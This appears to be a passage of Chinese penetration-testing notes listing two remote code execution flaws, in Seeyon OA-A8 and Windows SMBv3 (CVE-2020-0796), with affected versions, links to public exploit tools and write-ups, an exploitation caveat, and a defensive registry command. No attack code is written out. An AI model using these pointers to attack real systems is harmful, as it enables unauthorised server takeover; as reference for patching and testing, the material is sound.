    CNVD《关于致远OA-A8系统存在远程命令执行漏洞的安全公告》: https://www.cnvd.org.cn/webinfo/show/5095

    该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。

    攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码漏洞。

  2. 影响范围

    致远OA A8-V5 V6.1 SP1

    致远OA A8+协同管理软件 V7.0

    致远OA A8+协同管理软件 V7.0 SP1

    致远OA A8+协同管理软件 V7.0 SP2

    致远OA A8+协同管理软件 V7.0 SP3

    致远OA A8+协同管理软件 V7.1

  3. 漏洞利用工具

    https://github.com/timwhitez/seeyon-OA-A8-GetShell

  4. 详细文章

    https://www.jianshu.com/p/0955bdd7329c 任意文件上传详情

    https://www.cnblogs.com/AtesetEnginner/p/12106741.html 历史漏洞相关信息

CVE-2020-0796 永恒之黑漏洞相关



  1. 漏洞简介

    微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796

  2. 影响范围:

    Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation)

  3. 漏洞利用工具

    https://github.com/chompie1337/SMBGhost_RCE_PoC

  4. 详细文章

    https://www.cnblogs.com/Iamyoyodan/p/13081273.html

  5. 利用技巧与坑点

    偶尔会蓝屏

  6. 防护方法

    关闭高危端口139、445,更新系统安全补丁 禁用SMBv3压缩命令:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force